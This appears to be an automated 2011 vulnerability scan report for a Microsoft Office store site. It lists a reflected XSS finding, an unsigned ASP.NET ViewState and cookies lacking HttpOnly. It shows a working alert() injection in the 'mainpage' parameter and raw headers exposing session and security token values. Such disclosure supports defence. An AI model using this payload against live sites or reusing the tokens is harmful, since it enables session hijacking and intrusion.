XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, www2.buyoffice.microsoft.com

Report generated by XSS.CX at Sat Oct 29 08:01:35 CDT 2011.



1. Cross-site scripting (reflected)

2. ASP.NET ViewState without MAC enabled

2.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx

2.2. http://www2.buyoffice.microsoft.com/usa/error404.aspx

2.3. http://www2.buyoffice.microsoft.com/usa/promotion.aspx

3. Cookie without HttpOnly flag set

3.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx

3.2. http://www2.buyoffice.microsoft.com/usa/default.aspx

3.3. http://www2.buyoffice.microsoft.com/usa/gttracker.aspx

3.4. http://www2.buyoffice.microsoft.com/usa/liveperson.aspx

3.5. http://www2.buyoffice.microsoft.com/usa/promotion.aspx

3.6. http://www2.buyoffice.microsoft.com/error404redir.aspx

3.7. http://www2.buyoffice.microsoft.com/usa/error404.aspx

4. Cross-domain Referer leakage

4.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx

4.2. http://www2.buyoffice.microsoft.com/usa/promotion.aspx

5. Cross-domain script include

5.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx

5.2. http://www2.buyoffice.microsoft.com/usa/error404.aspx

5.3. http://www2.buyoffice.microsoft.com/usa/promotion.aspx

6. Content type incorrectly stated



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/liveperson.aspx

Issue detail

The value of the mainpage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc7f"%3balert(1)//670d7e6563e was submitted in the mainpage parameter. This input was echoed as 6cc7f";alert(1)//670d7e6563e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /usa/liveperson.aspx?cache=1968341058&culture=en-us&mainpage=other6cc7f"%3balert(1)//670d7e6563e HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:01:09 GMT
Content-Length: 4698
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 22:01:09 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:01:09 GMT; path=/
Vary: Accept-Encoding, User-Agent


document.write("<div id='lpChatDiv'></div>");
document.write("<noscript><p>Script section containing code for Liveperson Chat Solution</p></noscript>");
$(document).ready(function() {
var loc
...[SNIP]...
ber" : "72961245",
"LpDeploymentId" : "office-store",
"LpPageUnit" : "office-sales",
"LpLanguage" : "english",
"LpSection" : "other6cc7f";alert(1)//670d7e6563e",
"LpStoreFlow" : "buy"
};

if(localConfig.EnableLpControl === "true") {
var lpMTagConfig = window.lpMTagConfig || {};
lpMTagConfig.vars = lpMTagConfig
...[SNIP]...

2. ASP.NET ViewState without MAC enabled  previous  next
There are 3 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


2.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/basket.aspx

Request

GET /usa/basket.aspx?cache=-1528400984&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828193563:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:01:51 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 22:01:51 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:01:51 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NDgzNDU1NmRk" />
...[SNIP]...

2.2. http://www2.buyoffice.microsoft.com/usa/error404.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/error404.aspx

Request

GET /usa/error404.aspx HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828518287:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE; op390basketpagegum=a0qm1h421k27asr09a3thb27asq0963la5754; op390basketpageliid=a0qm1h421k27asr09a3thb27asq0963la5754; C5_TRACKING_TOKEN=ed794bbb18b94d4ab7bed7013f542b2d

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:02:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:02:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NDgzNDU1NmRk" />
...[SNIP]...

2.3. http://www2.buyoffice.microsoft.com/usa/promotion.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/promotion.aspx

Request

GET /usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
